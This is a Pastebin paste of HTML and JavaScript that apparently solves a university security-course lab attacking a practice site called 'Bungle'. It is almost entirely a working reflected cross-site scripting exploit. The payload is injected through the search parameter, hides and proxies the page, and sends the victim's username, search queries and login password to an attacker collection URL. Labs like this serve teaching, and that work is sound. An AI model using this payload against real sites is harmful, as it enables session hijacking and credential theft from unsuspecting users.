Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- // Extend this function:
- function payload(attacker, prox_url) {
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href) {
- $("html").load(href, function(){
- $("html").show();
- var username = $("#logged-in-user").text();
- log({event: "nav", user: username, uri: href});
- $("#query").val("PWND!");
- //Handle Search from home page
- $(".search-well > form").submit(function(evt) {
- evt.preventDefault();
- log({event: "search", test: "FUCK"});
- var query = $("#query").val();
- payload(attacker, "/search?q=" + query);
- });
- //handle log in from home page
- $(".well > form").submit(function(evt) {
- evt.preventDefault();
- var tmp_username = $("#username").val();
- var tmp_password = $("#userpass").val();
- log({event: "login", user: tmp_username, pass: tmp_password});
- $.post("/login", "username="+tmp_username+"&password="+tmp_password, "text");
- setTimeout(function() {payload(attacker, ".");}, 300);
- });
- //handle logout from anywhere
- $(".navbar-form").submit(function(evt) {
- evt.preventDefault();
- log({event: "logout", user: username});
- $.post("/logout", "true");
- setTimeout(function() {payload(attacker, ".");}, 300);
- })
- //handle search again button from search page
- $("#search-again-btn").removeAttr("href");
- $("#search-again-btn").click(function() {
- payload(attacker, ".");
- });
- });
- }
- $("html").hide();
- proxy(prox_url);
- }
- function makeLink(xssdefense, target, attacker, prox_url) {
- if (xssdefense == 0) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\", \"" + prox_url + "\");</script" + ">");
- } else {
- // Implement code to defeat XSS defenses here.
- }
- }
- var xssdefense = 0;
- var target = "http://bungle.cs461.cs.illinois.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker, ".");
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3></h3>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement